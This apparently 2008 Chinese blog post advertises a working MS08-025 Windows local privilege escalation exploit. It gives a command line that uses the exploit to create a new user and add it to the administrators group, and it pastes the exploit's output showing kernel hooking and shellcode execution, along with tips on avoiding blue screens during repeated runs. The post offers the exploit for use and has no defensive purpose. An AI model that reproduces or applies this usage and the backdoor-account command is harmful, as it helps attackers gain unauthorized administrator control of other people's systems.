最新的
同时也是真正可用的MS08025溢出利用程序
经过测试,在目前打了所有补丁Win XP sp2机器上 效果非常好
估计在Windows 2k,xp,2k3,vista的效果都是不错的
值得注意的是为了防止多次运行时服务器蓝屏,尽量直接用一次运行所有的命令
比如尽量使用:
MS08025 "cmd.exe /c net user Holmesian 123 /add & net localgroup administrators Holmesian /add"
这样一次性执行完毕的语句
[quote]
Local Privilege Escalation Vulnerability Exploit(MS08025)
Modify by [F.S.T] For 姬良
Run paltform: Windows 2k,xp,2k3,vista
ImageName: \WINDOWS\system32\ntkrnlpa.exe
[*] Get KernelBase Success, ntoskrnl.exe base = 80800000
[*] Mapping ntoskrnl.exe … ok
[*] KeServiceDescriptorTable = 00A746E0
[*] Find KiServiceTable … ok!!!
[*] KiServiceTable == 8082C734
[*] Get ZwVdmControl Number … ok!
[*] ZwVdmControl Call Number: 0000010C
[*] HookAddress: 8082CB64
[*] Create execute environment … Ok!
[*] call shellcode … Done.
[*] Create New Process:cmd.exe /c net user Holmesian 123 /add & net localgroup administrators Holmesian /add
命令成功完成。
[/quote]
-
日历
-
搜索
-
最新吐槽
- WAWA
学习了。。。 - fire
楼主:能不能发给我一份,我下... - xrffyf
顶啊 - juck
解决了 有效~ - Emily
强大! - Holmesian
@youstar:已经换好了~ - youstar
帮忙把友情链接更换一下,谢谢... - haizhen2020
非常感谢!支持楼主!顶!!!... - 日新小胖
@Holmesian:额,懂了。 我去关注... - Holmesian
@KEEPER:关于南昌星空极速Netkeepe...
- WAWA
-
分类
-
链接
-
随便看看
-
AD
2008-04-28 17:01
没打这个补丁 全成功了
偶尔蓝屏 发现用这个的时候尽量不用runas 命令 可以减少蓝屏的可能
还是有点用的。。。。